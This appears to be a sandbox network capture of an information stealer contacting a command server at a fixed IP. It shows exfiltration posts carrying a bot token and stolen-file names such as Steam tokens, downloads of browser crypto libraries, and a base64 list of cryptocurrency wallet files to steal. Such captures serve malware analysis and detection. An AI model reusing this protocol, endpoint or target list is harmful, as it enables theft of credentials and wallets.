Oct 14, 2024 01:53:17.584875107 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJ Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file"------GDBAKKKFBGDHJKFHJJJJ--
Oct 14, 2024 01:53:18.306180954 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 14, 2024 01:53:18.689205885 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 14, 2024 01:53:18.919497967 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 14, 2024 01:53:19.890604973 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 14, 2024 01:53:20.121350050 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 14, 2024 01:53:20.558146954 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 14, 2024 01:53:20.787561893 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 14, 2024 01:53:21.103888988 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 14, 2024 01:53:21.333481073 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:21 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 14, 2024 01:53:22.889657974 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 14, 2024 01:53:23.128720999 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:23 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 14, 2024 01:53:23.345992088 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 14, 2024 01:53:23.577694893 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:23 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 14, 2024 01:53:24.182046890 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJE Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 14, 2024 01:53:25.081681967 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 14, 2024 01:53:25.135976076 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFB Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="message"wallets------KFCFBFHIEBKJKFHIEBFB--
Oct 14, 2024 01:53:25.367477894 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:25 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 14, 2024 01:53:25.462289095 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIE Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="message"files------ECGDHIDAAFHIIDGDBFIE--
Oct 14, 2024 01:53:25.693541050 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:25 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 14, 2024 01:53:25.711106062 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBK Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file"------AFBKKFBAEGDHJJJJKFBK--
Oct 14, 2024 01:53:26.435044050 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:25 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 14, 2024 01:53:26.437618017 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCB Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="message"ybncbhylepme------KFIJEGCBGIDGHIDHDGCB--
Oct 14, 2024 01:53:26.674138069 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:26 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 30 63 0d 0a 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 